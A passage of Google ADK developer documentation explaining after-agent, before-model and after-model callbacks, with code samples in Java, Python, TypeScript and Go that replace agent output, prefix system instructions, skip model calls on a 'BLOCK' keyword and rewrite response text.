import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import io.reactivex.rxjava3.core.Maybe; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; public class AfterAgentCallbackExample { // --- Constants --- private static final String APP_NAME = "after_agent_demo"; private static final String USER_ID = "test_user_after"; private static final String SESSION_ID_NORMAL = "session_run_normally"; private static final String SESSION_ID_MODIFY = "session_modify_output"; private static final String MODEL_NAME = "gemini-2.0-flash"; public static void main(String[] args) { AfterAgentCallbackExample demo = new AfterAgentCallbackExample(); demo.defineAgentAndRunScenarios(); } // --- 1. Define the Callback Function --- /** * Log exit from an agent and checks 'add_concluding_note' in session state. If True, returns new * Content to *replace* the agent's original output. If False or not present, returns * Maybe.empty(), allowing the agent's original output to be used. */ public Maybe modifyOutputAfterAgent(CallbackContext callbackContext) { String agentName = callbackContext.agentName(); String invocationId = callbackContext.invocationId(); State currentState = callbackContext.state(); System.out.printf("%n[Callback] Exiting agent: %s (Inv: %s)%n", agentName, invocationId); System.out.printf("[Callback] Current State: %s%n", currentState.entrySet()); Object addNoteFlag = currentState.get("add_concluding_note"); // Example: Check state to decide whether to modify the final output if (Boolean.TRUE.equals(addNoteFlag)) { System.out.printf( "[Callback] State condition 'add_concluding_note=True' met: Replacing agent %s's" + " output.%n", agentName); // Return Content to *replace* the agent's own output return Maybe.just( Content.builder() .parts( List.of( Part.fromText( "Concluding note added by after_agent_callback, replacing original output."))) .role("model") // Assign model role to the overriding response .build()); } else { System.out.printf( "[Callback] State condition not met: Using agent %s's original output.%n", agentName); // Return None - the agent's output produced just before this callback will be used. return Maybe.empty(); } } // --- 2. Setup Agent with Callback --- public void defineAgentAndRunScenarios() { LlmAgent llmAgentWithAfterCb = LlmAgent.builder() .name(APP_NAME) .model(MODEL_NAME) .description("An LLM agent demonstrating after_agent_callback for output modification") .instruction("You are a simple agent. Just say 'Processing complete!'") .afterAgentCallback(this::modifyOutputAfterAgent) // Assign the callback here .build(); // --- 3. Setup Runner and Sessions using InMemoryRunner --- // Use InMemoryRunner - it includes InMemorySessionService InMemoryRunner runner = new InMemoryRunner(llmAgentWithAfterCb, APP_NAME); // --- Scenario 1: Run where callback allows agent's original output --- System.out.printf( "%n%s SCENARIO 1: Running Agent (Should Use Original Output) %s%n", "=".repeat(20), "=".repeat(20)); // No initial state means 'add_concluding_note' will be false in the callback check runScenario( runner, llmAgentWithAfterCb.name(), // Use agent name for runner's appName consistency SESSION_ID_NORMAL, null, "Process this please."); // --- Scenario 2: Run where callback replaces the agent's output --- System.out.printf( "%n%s SCENARIO 2: Running Agent (Should Replace Output) %s%n", "=".repeat(20), "=".repeat(20)); Map modifyState = new HashMap<>(); modifyState.put("add_concluding_note", true); // Set the state flag here runScenario( runner, llmAgentWithAfterCb.name(), // Use agent name for runner's appName consistency SESSION_ID_MODIFY, new ConcurrentHashMap<>(modifyState), "Process this and add note."); } // --- 3. Method to Run a Single Scenario --- public void runScenario( InMemoryRunner runner, String appName, String sessionId, ConcurrentHashMap initialState, String userQuery) { // Create session using the runner's bundled session service runner.sessionService().createSession(appName, USER_ID, initialState, sessionId).blockingGet(); System.out.printf( "Running scenario for session: %s, initial state: %s%n", sessionId, initialState); Content userMessage = Content.builder().role("user").parts(List.of(Part.fromText(userQuery))).build(); Flowable eventStream = runner.runAsync(USER_ID, sessionId, userMessage); // Print final output eventStream.blockingForEach( event -> { if (event.finalResponse() && event.content().isPresent()) { String author = event.author() != null ? event.author() : "UNKNOWN"; String text = event .content() .flatMap(Content::parts) .filter(parts -> !parts.isEmpty()) .map(parts -> parts.get(0).text().orElse("").trim()) .orElse("[No text in final response]"); System.out.printf("Final Output for %s: [%s] %s%n", sessionId, author, text); } else if (event.errorCode().isPresent()) { System.out.printf( "Error Event for %s: %s%n", sessionId, event.errorMessage().orElse("Unknown error")); } }); } } ``` **Note on the `after_agent_callback` Example:** - **What it Shows:** This example demonstrates the `after_agent_callback`. This callback runs *right after* the agent's main processing logic has finished and produced its result, but *before* that result is finalized and returned. - **How it Works:** The callback function (`modify_output_after_agent`) checks a flag (`add_concluding_note`) in the session's state. - If the flag is `True`, the callback returns a *new* `types.Content` object. This tells the ADK framework to **append** the agent's original output with the content returned by the callback. - If the flag is `False` (or not set), the callback returns `None` or an empty object. This tells the ADK framework to **use** the original output generated by the agent. - **Expected Outcome:** You'll see two scenarios: 1. In the session *without* the `add_concluding_note: True` state, the callback allows the agent's original output ("Processing complete!") to be used. 1. In the session *with* that state flag, the callback intercepts the agent's original output and appends it with its own message ("Concluding note added..."). - **Understanding Callbacks:** This highlights how `after_` callbacks allow **post-processing** or **modification**. You can inspect the result of a step (the agent's run) and decide whether to let it pass through, change it, or completely replace it based on your logic. ## LLM Interaction Callbacks These callbacks are specific to `LlmAgent` and provide hooks around the interaction with the Large Language Model. ### Before Model Callback **When:** Called just before the `generate_content_async` (or equivalent) request is sent to the LLM within an `LlmAgent`'s flow. **Purpose:** Allows inspection and modification of the request going to the LLM. Use cases include adding dynamic instructions, injecting few-shot examples based on state, modifying model config, implementing guardrails (like profanity filters), or implementing request-level caching. **Return Value Effect:** If the callback returns `None` (or a `Maybe.empty()` object in Java), the LLM continues its normal workflow. If the callback returns an `LlmResponse` object, then the call to the LLM is **skipped**. The returned `LlmResponse` is used directly as if it came from the model. This is powerful for implementing guardrails or caching. Code ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.agents import LlmAgent from google.adk.agents.callback_context import CallbackContext from google.adk.models import LlmResponse, LlmRequest from google.adk.runners import Runner from typing import Optional from google.genai import types from google.adk.sessions import InMemorySessionService GEMINI_2_FLASH="gemini-2.0-flash" # --- Define the Callback Function --- def simple_before_model_modifier( callback_context: CallbackContext, llm_request: LlmRequest ) -> Optional[LlmResponse]: """Inspects/modifies the LLM request or skips the call.""" agent_name = callback_context.agent_name print(f"[Callback] Before model call for agent: {agent_name}") # Inspect the last user message in the request contents last_user_message = "" if llm_request.contents and llm_request.contents[-1].role == 'user': if llm_request.contents[-1].parts: last_user_message = llm_request.contents[-1].parts[0].text print(f"[Callback] Inspecting last user message: '{last_user_message}'") # --- Modification Example --- # Add a prefix to the system instruction original_instruction = llm_request.config.system_instruction or types.Content(role="system", parts=[]) prefix = "[Modified by Callback] " # Ensure system_instruction is Content and parts list exists if not isinstance(original_instruction, types.Content): # Handle case where it might be a string (though config expects Content) original_instruction = types.Content(role="system", parts=[types.Part(text=str(original_instruction))]) if not original_instruction.parts: original_instruction.parts.append(types.Part(text="")) # Add an empty part if none exist # Modify the text of the first part modified_text = prefix + (original_instruction.parts[0].text or "") original_instruction.parts[0].text = modified_text llm_request.config.system_instruction = original_instruction print(f"[Callback] Modified system instruction to: '{modified_text}'") # --- Skip Example --- # Check if the last user message contains "BLOCK" if "BLOCK" in last_user_message.upper(): print("[Callback] 'BLOCK' keyword found. Skipping LLM call.") # Return an LlmResponse to skip the actual LLM call return LlmResponse( content=types.Content( role="model", parts=[types.Part(text="LLM call was blocked by before_model_callback.")], ) ) else: print("[Callback] Proceeding with LLM call.") # Return None to allow the (modified) request to go to the LLM return None # Create LlmAgent and Assign Callback my_llm_agent = LlmAgent( name="ModelCallbackAgent", model=GEMINI_2_FLASH, instruction="You are a helpful assistant.", # Base instruction description="An LLM agent demonstrating before_model_callback", before_model_callback=simple_before_model_modifier # Assign the function here ) APP_NAME = "guardrail_app" USER_ID = "user_1" SESSION_ID = "session_001" # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=my_llm_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("write a joke on BLOCK") ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, InMemoryRunner, CallbackContext, isFinalResponse, } from "@google/adk"; import { createUserContent } from "@google/genai"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "before_model_callback_app"; const USER_ID = "test_user_before_model"; const SESSION_ID_BLOCK = "session_block_model_call"; const SESSION_ID_NORMAL = "session_normal_model_call"; // --- Define the Callback Function --- function simpleBeforeModelModifier({ context, request, }: { context: CallbackContext; request: any; }): any | undefined { console.log(`[Callback] Before model call for agent: ${context.agentName}`); // Inspect the last user message in the request contents const lastUserMessage = request.contents?.at(-1)?.parts?.[0]?.text ?? ""; console.log(`[Callback] Inspecting last user message: '${lastUserMessage}'`); // --- Modification Example --- // Add a prefix to the system instruction. // We create a deep copy to avoid modifying the original agent's config object. const modifiedConfig = JSON.parse(JSON.stringify(request.config)); const originalInstructionText = modifiedConfig.systemInstruction?.parts?.[0]?.text ?? ""; const prefix = "[Modified by Callback] "; modifiedConfig.systemInstruction = { role: "system", parts: [{ text: prefix + originalInstructionText }], }; request.config = modifiedConfig; // Assign the modified config back to the request console.log( `[Callback] Modified system instruction to: '${modifiedConfig.systemInstruction.parts[0].text}'` ); // --- Skip Example --- // Check if the last user message contains "BLOCK" if (lastUserMessage.toUpperCase().includes("BLOCK")) { console.log("[Callback] 'BLOCK' keyword found. Skipping LLM call."); // Return an LlmResponse to skip the actual LLM call return { content: { role: "model", parts: [ { text: "LLM call was blocked by the before_model_callback." }, ], }, }; } console.log("[Callback] Proceeding with LLM call."); // Return undefined to allow the (modified) request to go to the LLM return undefined; } // --- Create LlmAgent and Assign Callback --- const myLlmAgent = new LlmAgent({ name: "ModelCallbackAgent", model: MODEL_NAME, instruction: "You are a helpful assistant.", // Base instruction description: "An LLM agent demonstrating before_model_callback", beforeModelCallback: simpleBeforeModelModifier, // Assign the function here }); // --- Agent Interaction Logic --- async function callAgentAndPrint( runner: InMemoryRunner, query: string, sessionId: string ) { console.log(`\n>>> Calling Agent with query: "${query}"`); let finalResponseContent = "No final response received."; const events = runner.runAsync({ userId: USER_ID, sessionId, newMessage: createUserContent(query) }); for await (const event of events) { if (isFinalResponse(event) && event.content?.parts?.length) { finalResponseContent = event.content.parts .map((part: { text?: string }) => part.text ?? "") .join(""); } } console.log("<<< Agent Response: ", finalResponseContent); } // --- Run Interactions --- async function main() { const runner = new InMemoryRunner({ agent: myLlmAgent, appName: APP_NAME }); // Scenario 1: The callback will find "BLOCK" and skip the model call await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_BLOCK, }); await callAgentAndPrint( runner, "write a joke about BLOCK", SESSION_ID_BLOCK ); // Scenario 2: The callback will modify the instruction and proceed await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_NORMAL, }); await callAgentAndPrint(runner, "write a short poem", SESSION_ID_NORMAL); } main(); ``` ```go package main import ( "context" "fmt" "log" "regexp" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) func onBeforeModel(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) { log.Printf("[Callback] BeforeModel triggered for agent %q.", ctx.AgentName()) // Modification Example: Add a prefix to the system instruction. if req.Config.SystemInstruction != nil { prefix := "[Modified by Callback] " // This is a simplified example; production code might need deeper checks. if len(req.Config.SystemInstruction.Parts) > 0 { req.Config.SystemInstruction.Parts[0].Text = prefix + req.Config.SystemInstruction.Parts[0].Text } else { req.Config.SystemInstruction.Parts = append(req.Config.SystemInstruction.Parts, &genai.Part{Text: prefix}) } log.Printf("[Callback] Modified system instruction.") } // Skip Example: Check for "BLOCK" in the user's prompt. for _, content := range req.Contents { for _, part := range content.Parts { if strings.Contains(strings.ToUpper(part.Text), "BLOCK") { log.Println("[Callback] 'BLOCK' keyword found. Skipping LLM call.") return &model.LLMResponse{ Content: &genai.Content{ Parts: []*genai.Part{{Text: "LLM call was blocked by before_model_callback."}}, Role: "model", }, }, nil } } } log.Println("[Callback] Proceeding with LLM call.") return nil, nil } func runBeforeModelExample() { ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("FATAL: Failed to create model: %v", err) } llmCfg := llmagent.Config{ Name: "AgentWithBeforeModelCallback", Model: geminiModel, BeforeModelCallbacks: []llmagent.BeforeModelCallback{onBeforeModel}, } testAgent, err := llmagent.New(llmCfg) if err != nil { log.Fatalf("FATAL: Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{AppName: appName, Agent: testAgent, SessionService: sessionService}) if err != nil { log.Fatalf("FATAL: Failed to create runner: %v", err) } log.Println("--- SCENARIO 1: Should proceed to LLM ---") runScenario(ctx, r, sessionService, appName, "session_normal", nil, "Tell me a fun fact.") log.Println("\n--- SCENARIO 2: Should be blocked by callback ---") runScenario(ctx, r, sessionService, appName, "session_blocked", nil, "write a joke on BLOCK") } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.CallbackContext; import com.google.adk.events.Event; import com.google.adk.models.LlmRequest; import com.google.adk.models.LlmResponse; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.common.collect.ImmutableList; import com.google.common.collect.Iterables; import com.google.genai.types.Content; import com.google.genai.types.GenerateContentConfig; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import io.reactivex.rxjava3.core.Maybe; import java.util.ArrayList; import java.util.List; public class BeforeModelCallbackExample { // --- Define Constants --- private static final String AGENT_NAME = "ModelCallbackAgent"; private static final String MODEL_NAME = "gemini-2.0-flash"; private static final String AGENT_INSTRUCTION = "You are a helpful assistant."; private static final String AGENT_DESCRIPTION = "An LLM agent demonstrating before_model_callback"; // For session and runner private static final String APP_NAME = "guardrail_app_java"; private static final String USER_ID = "user_1_java"; public static void main(String[] args) { BeforeModelCallbackExample demo = new BeforeModelCallbackExample(); demo.defineAgentAndRun(); } // --- 1. Define the Callback Function --- // Inspects/modifies the LLM request or skips the actual LLM call. public Maybe simpleBeforeModelModifier( CallbackContext callbackContext, LlmRequest llmRequest) { String agentName = callbackContext.agentName(); System.out.printf("%n[Callback] Before model call for agent: %s%n", agentName); String lastUserMessage = ""; if (llmRequest.contents() != null && !llmRequest.contents().isEmpty()) { Content lastContentItem = Iterables.getLast(llmRequest.contents()); if ("user".equals(lastContentItem.role().orElse(null)) && lastContentItem.parts().isPresent() && !lastContentItem.parts().get().isEmpty()) { lastUserMessage = lastContentItem.parts().get().get(0).text().orElse(""); } } System.out.printf("[Callback] Inspecting last user message: '%s'%n", lastUserMessage); // --- Modification Example --- // Add a prefix to the system instruction Content systemInstructionFromRequest = Content.builder().parts(ImmutableList.of()).build(); // Ensure system_instruction is Content and parts list exists if (llmRequest.config().isPresent()) { systemInstructionFromRequest = llmRequest .config() .get() .systemInstruction() .orElseGet(() -> Content.builder().role("system").parts(ImmutableList.of()).build()); } List currentSystemParts = new ArrayList<>(systemInstructionFromRequest.parts().orElse(ImmutableList.of())); // Ensure a part exists for modification if (currentSystemParts.isEmpty()) { currentSystemParts.add(Part.fromText("")); } // Modify the text of the first part String prefix = "[Modified by Callback] "; String conceptuallyModifiedText = prefix + currentSystemParts.get(0).text().orElse(""); llmRequest = llmRequest.toBuilder() .config( GenerateContentConfig.builder() .systemInstruction( Content.builder() .parts(List.of(Part.fromText(conceptuallyModifiedText))) .build()) .build()) .build(); System.out.printf( "Modified System Instruction %s", llmRequest.config().get().systemInstruction()); // --- Skip Example --- // Check if the last user message contains "BLOCK" if (lastUserMessage.toUpperCase().contains("BLOCK")) { System.out.println("[Callback] 'BLOCK' keyword found. Skipping LLM call."); // Return an LlmResponse to skip the actual LLM call return Maybe.just( LlmResponse.builder() .content( Content.builder() .role("model") .parts( ImmutableList.of( Part.fromText("LLM call was blocked by before_model_callback."))) .build()) .build()); } // Return Empty response to allow the (modified) request to go to the LLM System.out.println("[Callback] Proceeding with LLM call (using the original LlmRequest)."); return Maybe.empty(); } // --- 2. Define Agent and Run Scenarios --- public void defineAgentAndRun() { // Setup Agent with Callback LlmAgent myLlmAgent = LlmAgent.builder() .name(AGENT_NAME) .model(MODEL_NAME) .instruction(AGENT_INSTRUCTION) .description(AGENT_DESCRIPTION) .beforeModelCallback(this::simpleBeforeModelModifier) .build(); // Create an InMemoryRunner InMemoryRunner runner = new InMemoryRunner(myLlmAgent, APP_NAME); // InMemoryRunner automatically creates a session service. Create a session using the service Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet(); Content userMessage = Content.fromParts( Part.fromText("Tell me about quantum computing. This is a test. So BLOCK.")); // Run the agent Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); // Stream event response eventStream.blockingForEach( event -> { if (event.finalResponse()) { System.out.println(event.stringifyContent()); } }); } } ``` ### After Model Callback **When:** Called just after a response (`LlmResponse`) is received from the LLM, before it's processed further by the invoking agent. **Purpose:** Allows inspection or modification of the raw LLM response. Use cases include - logging model outputs, - reformatting responses, - censoring sensitive information generated by the model, - parsing structured data from the LLM response and storing it in `callback_context.state` - or handling specific error codes. Code ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.agents import LlmAgent from google.adk.agents.callback_context import CallbackContext from google.adk.runners import Runner from typing import Optional from google.genai import types from google.adk.sessions import InMemorySessionService from google.adk.models import LlmResponse from copy import deepcopy GEMINI_2_FLASH="gemini-2.0-flash" # --- Define the Callback Function --- def simple_after_model_modifier( callback_context: CallbackContext, llm_response: LlmResponse ) -> Optional[LlmResponse]: """Inspects/modifies the LLM response after it's received.""" agent_name = callback_context.agent_name print(f"[Callback] After model call for agent: {agent_name}") # --- Inspection --- original_text = "" if llm_response.content and llm_response.content.parts: # Assuming simple text response for this example if llm_response.content.parts[0].text: original_text = llm_response.content.parts[0].text print(f"[Callback] Inspected original response text: '{original_text[:100]}...'") # Log snippet elif llm_response.content.parts[0].function_call: print(f"[Callback] Inspected response: Contains function call '{llm_response.content.parts[0].function_call.name}'. No text modification.") return None # Don't modify tool calls in this example else: print("[Callback] Inspected response: No text content found.") return None elif llm_response.error_message: print(f"[Callback] Inspected response: Contains error '{llm_response.error_message}'. No modification.") return None else: print("[Callback] Inspected response: Empty LlmResponse.") return None # Nothing to modify # --- Modification Example --- # Replace "joke" with "funny story" (case-insensitive) search_term = "joke" replace_term = "funny story" if search_term in original_text.lower(): print(f"[Callback] Found '{search_term}'. Modifying response.") modified_text = original_text.replace(search_term, replace_term) modified_text = modified_text.replace(search_term.capitalize(), replace_term.capitalize()) # Handle capitalization # Create a NEW LlmResponse with the modified content # Deep copy parts to avoid modifying original if other callbacks exist modified_parts = [deepcopy(part) for part in llm_response.content.parts] modified_parts[0].text = modified_text # Update the text in the copied part new_response = LlmResponse( content=types.Content(role="model", parts=modified_parts), # Copy other relevant fields if necessary, e.g., grounding_metadata grounding_metadata=llm_response.grounding_metadata ) print(f"[Callback] Returning modified response.") return new_response # Return the modified response else: print(f"[Callback] '{search_term}' not found. Passing original response through.") # Return None to use the original llm_response return None # Create LlmAgent and Assign Callback my_llm_agent = LlmAgent( name="AfterModelCallbackAgent", model=GEMINI_2_FLASH, instruction="You are a helpful assistant.", description="An LLM agent demonstrating after_model_callback", after_model_callback=simple_after_model_modifier # Assign the function here ) APP_NAME = "guardrail_app" USER_ID = "user_1" SESSION_ID = "session_001" # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=my_llm_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): session, runner = await setup_session_and_runner() content = types.Content(role='user', parts=[types.Part(text=query)]) events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("""write multiple time the word "joke" """) ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, InMemoryRunner, CallbackContext, isFinalResponse, } from "@google/adk"; import { createUserContent } from "@google/genai"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "after_model_callback_app"; const USER_ID = "test_user_after_model"; const SESSION_ID_JOKE = "session_modify_model_call"; const SESSION_ID_POEM = "session_normal_model_call"; // --- Define the Callback Function --- function simpleAfterModelModifier({ context, response, }: { context: CallbackContext; response: any; }): any | undefined { console.log( `[Callback] After model call for agent: ${context.agentName}` ); const modelResponseText = response.content?.parts?.[0]?.text ?? ""; console.log(`[Callback] Inspecting model response: "${modelResponseText.substring(0, 50)}..."`); // --- Modification Example --- // Replace "joke" with "funny story" (case-insensitive) const searchTerm = "joke"; const replaceTerm = "funny story"; if (modelResponseText.toLowerCase().includes(searchTerm)) { console.log(`[Callback] Found '${searchTerm}'. Modifying response.`); // Create a deep copy to avoid mutating the original response object const modifiedResponse = JSON.parse(JSON.stringify(response)); // Safely modify the text of the first part if (modifiedResponse.content?.parts?.[0]) { // Use a regular expression for case-insensitive replacement const regex = new RegExp(searchTerm, "gi"); modifiedResponse.content.parts[0].text = modelResponseText.replace(regex, replaceTerm); } console.log(`[Callback] Returning modified response.`); return modifiedResponse; } console.log("[Callback] Proceeding with original LLM response."); // Return undefined to proceed without any modifications return undefined; } // --- Create LlmAgent and Assign Callback --- const myLlmAgent = new LlmAgent({ name: "AfterModelCallbackAgent", model: MODEL_NAME, instruction: "You are a helpful assistant who tells jokes.", description: "An LLM agent demonstrating after_model_callback", afterModelCallback: simpleAfterModelModifier, // Assign the function here }); // --- Agent Interaction Logic --- async function callAgentAndPrint({runner, query, sessionId,}: { runner: InMemoryRunner; query: string; sessionId: string;}) { console.log(`\n>>> Calling Agent with query: "${query}"`); let finalResponseContent = "No final response received."; const events = runner.runAsync({ userId: USER_ID, sessionId: sessionId, newMessage: createUserContent(query), }); for await (const event of events) { if (isFinalResponse(event) && event.content?.parts?.length) { finalResponseContent = event.content.parts .map((part: { text?: string }) => part.text ?? "") .join(""); } } console.log("<<< Agent Response: ", finalResponseContent); } // --- Run Interactions --- async function main() { const runner = new InMemoryRunner({ agent: myLlmAgent, appName: APP_NAME }); // Scenario 1: The callback will find "joke" and modify the response await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_JOKE, }); await callAgentAndPrint({ runner: runner, query: 'write a short joke about computers', sessionId: SESSION_ID_JOKE, }); // Scenario 2: The callback will not find "joke" and will pass the response through unmodified await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_POEM, }); await callAgentAndPrint({ runner: runner, query: 'write a short poem about coding', sessionId: SESSION_ID_POEM, }); } main(); ``` ```go package main import ( "context" "fmt" "log" "regexp" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) func onAfterModel(ctx agent.CallbackContext, resp *model.LLMResponse, respErr error) (*model.LLMResponse, error) { log.Printf("[Callback] AfterModel triggered for agent %q.", ctx.AgentName()) if respErr != nil { log.Printf("[Callback] Model returned an error: %v. Passing it through.", respErr) return nil, respErr } if resp == nil || resp.Content == nil || len(resp.Content.Parts) == 0 { log.Println("[Callback] Response is nil or has no parts, nothing to process.") return nil, nil } // Check for function calls and pass them through without modification. if resp.Content.Parts[0].FunctionCall != nil { log.Println("[Callback] Response is a function call. No modification.") return nil, nil } originalText := resp.Content.Parts[0].Text // Use a case-insensitive regex with word boundaries to find "joke". re := regexp.MustCompile(`(?i)\bjoke\b`) if !re.MatchString(originalText) { log.Println("[Callback] 'joke' not found. Passing original response through.") return nil, nil } log.Println("[Callback] 'joke' found. Modifying response.") // Use a replacer function to handle capitalization. modifiedText := re.ReplaceAllStringFunc(originalText, func(s string) string { if strings.ToUpper(s) == "JOKE" { if s == "Joke" { return "Funny story" } return "funny story" } return s // Should not be reached with this regex, but it's safe. }) resp.Content.Parts[0].Text = modifiedText return resp, nil } func runAfterModelExample() { ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("FATAL: Failed to create model: %v", err) } llmCfg := llmagent.Config{ Name: "AgentWithAfterModelCallback", Model: geminiModel, AfterModelCallbacks: []llmagent.AfterModelCallback{onAfterModel}, } testAgent, err := llmagent.New(llmCfg) if err != nil { log.Fatalf("FATAL: Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{AppName: appName, Agent: testAgent, SessionService: sessionService}) if err != nil { log.Fatalf("FATAL: Failed to create runner: %v", err) } log.Println("--- SCENARIO 1: Response should be modified ---") runScenario(ctx, r, sessionService, appName, "session_modify", nil, `Give me a paragraph about different styles of jokes.`) } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.CallbackContext; import com.google.adk.events.Event; import com.google.adk.models.LlmResponse; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.common.collect.ImmutableList; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import io.reactivex.rxjava3.core.Maybe; import java.util.ArrayList; import java.util.List; import java.util.Optional; import java.util.regex.Matcher; import java.util.regex.Pattern; public class AfterModelCallbackExample { // --- Define Constants --- private static final String AGENT_NAME = "AfterModelCallbackAgent"; private static final String MODEL_NAME = "gemini-2.0-flash"; private static final String AGENT_INSTRUCTION = "You are a helpful assistant."; private static final String AGENT_DESCRIPTION = "An LLM agent demonstrating after_model_callback"; // For session and runner private static final String APP_NAME = "AfterModelCallbackAgentApp"; private static final String USER_ID = "user_1"; // For text replacement private static final String SEARCH_TERM = "joke"; private static final String REPLACE_TERM = "funny story"; private static final Pattern SEARCH_PATTERN = Pattern.compile("\\b" + Pattern.quote(SEARCH_TERM) + "\\b", Pattern.CASE_INSENSITIVE); public static void main(String[] args) { AfterModelCallbackExample example = new AfterModelCallbackExample(); example.defineAgentAndRun(); } // --- Define the Callback Function --- // Inspects/modifies the LLM response after it's received. public Maybe simpleAfterModelModifier( CallbackContext callbackContext, LlmResponse llmResponse) { String agentName = callbackContext.agentName(); System.out.printf("%n[Callback] After model call for agent: %s%n", agentName); // --- Inspection Phase --- if (llmResponse.errorMessage().isPresent()) { System.out.printf( "[Callback] Response has error: '%s'. No modification.%n", llmResponse.errorMessage().get()); return Maybe.empty(); // Pass through errors } Optional firstTextPartOpt = llmResponse .content() .flatMap(Content::parts) .filter(parts -> !parts.isEmpty() && parts.get(0).text().isPresent()) .map(parts -> parts.get(0)); if (!firstTextPartOpt.isPresent()) { // Could be a function call, empty content, or no text in the first part llmResponse .content() .flatMap(Content::parts) .filter(parts -> !parts.isEmpty() && parts.get(0).functionCall().isPresent()) .ifPresent( parts -> System.out.printf( "[Callback] Response is a function call ('%s'). No text modification.%n", parts.get(0).functionCall().get().name().orElse("N/A"))); if (!llmResponse.content().isPresent() || !llmResponse.content().flatMap(Content::parts).isPresent() || llmResponse.content().flatMap(Content::parts).get().isEmpty()) { System.out.println( "[Callback] Response content is empty or has no parts. No modification."); } else if (!firstTextPartOpt.isPresent()) { // Already checked for function call System.out.println("[Callback] First part has no text content. No modification."); } return Maybe.empty(); // Pass through non-text or unsuitable responses } String originalText = firstTextPartOpt.get().text().get(); System.out.printf("[Callback] Inspected original text: '%.100s...'%n", originalText); // --- Modification Phase --- Matcher matcher = SEARCH_PATTERN.matcher(originalText); if (!matcher.find()) { System.out.printf( "[Callback] '%s' not found. Passing original response through.%n", SEARCH_TERM); return Maybe.empty(); } System.out.printf("[Callback] Found '%s'. Modifying response.%n", SEARCH_TERM); // Perform the replacement, respecting original 